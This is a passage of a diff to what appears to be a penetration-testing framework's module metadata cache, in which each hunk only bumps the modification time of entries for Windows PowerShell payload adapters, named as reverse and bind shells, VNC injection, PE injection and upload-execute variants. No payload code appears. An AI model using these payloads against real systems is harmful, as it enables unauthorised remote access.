+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp_rc4_dns",
@@ -174450,7 +174565,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp_uuid",
@@ -174489,7 +174604,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/bind_hidden_ipknock_tcp",
@@ -174528,7 +174643,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/bind_hidden_tcp",
@@ -174566,7 +174681,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/bind_ipv6_tcp",
@@ -174605,7 +174720,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/bind_ipv6_tcp_uuid",
@@ -174641,7 +174756,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/bind_named_pipe",
@@ -174677,7 +174792,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/bind_nonx_tcp",
@@ -174715,7 +174830,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/bind_tcp",
@@ -174755,7 +174870,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/bind_tcp_rc4",
@@ -174792,7 +174907,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/bind_tcp_uuid",
@@ -174828,7 +174943,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/find_tag",
@@ -174866,7 +174981,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/reverse_ipv6_tcp",
@@ -174902,7 +175017,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/reverse_named_pipe",
@@ -174938,7 +175053,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/reverse_nonx_tcp",
@@ -174974,7 +175089,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/reverse_ord_tcp",
@@ -175012,7 +175127,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/reverse_tcp",
@@ -175050,7 +175165,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/reverse_tcp_allports",
@@ -175089,7 +175204,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/reverse_tcp_dns",
@@ -175129,7 +175244,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/reverse_tcp_rc4",
@@ -175169,7 +175284,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/reverse_tcp_rc4_dns",
@@ -175206,7 +175321,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/reverse_tcp_uuid",
@@ -175241,7 +175356,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/pingback_bind_tcp",
@@ -175276,7 +175391,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/pingback_reverse_tcp",
@@ -175314,7 +175429,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/powershell_bind_tcp",
@@ -175352,7 +175467,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/powershell_reverse_tcp",
@@ -175390,7 +175505,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/powershell_reverse_tcp_ssl",
@@ -175429,7 +175544,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/bind_hidden_ipknock_tcp",
@@ -175468,7 +175583,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/bind_hidden_tcp",
@@ -175506,7 +175621,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/bind_ipv6_tcp",
@@ -175545,7 +175660,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/bind_ipv6_tcp_uuid",
@@ -175582,7 +175697,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/bind_named_pipe",
@@ -175619,7 +175734,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/bind_nonx_tcp",
@@ -175657,7 +175772,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/bind_tcp",
@@ -175697,7 +175812,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/bind_tcp_rc4",
@@ -175735,7 +175850,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/bind_tcp_uuid",
@@ -175772,7 +175887,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/find_tag",
@@ -175810,7 +175925,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/reverse_ipv6_tcp",
@@ -175847,7 +175962,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/reverse_nonx_tcp",
@@ -175883,7 +175998,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/reverse_ord_tcp",
@@ -175921,7 +176036,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/reverse_tcp",
@@ -175959,7 +176074,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/reverse_tcp_allports",
@@ -175998,7 +176113,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/reverse_tcp_dns",
@@ -176038,7 +176153,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/reverse_tcp_rc4",
@@ -176078,7 +176193,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/reverse_tcp_rc4_dns",
@@ -176116,7 +176231,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/reverse_tcp_uuid",
@@ -176153,7 +176268,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/reverse_udp",
@@ -176189,7 +176304,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell_bind_tcp",
@@ -176224,7 +176339,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell_bind_tcp_xpfw",
@@ -176261,7 +176376,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell_hidden_bind_tcp",
@@ -176297,7 +176412,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell_reverse_tcp",
@@ -176332,7 +176447,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/speak_pwned",
@@ -176371,7 +176486,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/bind_hidden_ipknock_tcp",
@@ -176410,7 +176525,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/bind_hidden_tcp",
@@ -176448,7 +176563,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/bind_ipv6_tcp",
@@ -176487,7 +176602,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/bind_ipv6_tcp_uuid",
@@ -176524,7 +176639,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/bind_named_pipe",
@@ -176560,7 +176675,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/bind_nonx_tcp",
@@ -176598,7 +176713,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/bind_tcp",
@@ -176638,7 +176753,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/bind_tcp_rc4",
@@ -176676,7 +176791,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/bind_tcp_uuid",
@@ -176713,7 +176828,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/find_tag",
@@ -176751,7 +176866,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/reverse_ipv6_tcp",
@@ -176787,7 +176902,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/reverse_nonx_tcp",
@@ -176824,7 +176939,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/reverse_ord_tcp",
@@ -176862,7 +176977,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/reverse_tcp",
@@ -176900,7 +177015,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/reverse_tcp_allports",
@@ -176939,7 +177054,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/reverse_tcp_dns",
@@ -176979,7 +177094,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/reverse_tcp_rc4",
@@ -177019,7 +177134,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/reverse_tcp_rc4_dns",
@@ -177057,7 +177172,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/reverse_tcp_uuid",
@@ -177094,7 +177209,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/reverse_udp",
@@ -177133,7 +177248,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/bind_hidden_ipknock_tcp",
@@ -177172,7 +177287,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/bind_hidden_tcp",
@@ -177210,7 +177325,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/bind_ipv6_tcp",
@@ -177249,7 +177364,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/bind_ipv6_tcp_uuid",
@@ -177286,7 +177401,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/bind_named_pipe",
@@ -177323,7 +177438,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/bind_nonx_tcp",
@@ -177361,7 +177476,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/bind_tcp",
@@ -177401,7 +177516,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/bind_tcp_rc4",
@@ -177439,7 +177554,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/bind_tcp_uuid",
@@ -177476,7 +177591,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/find_tag",
@@ -177515,7 +177630,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
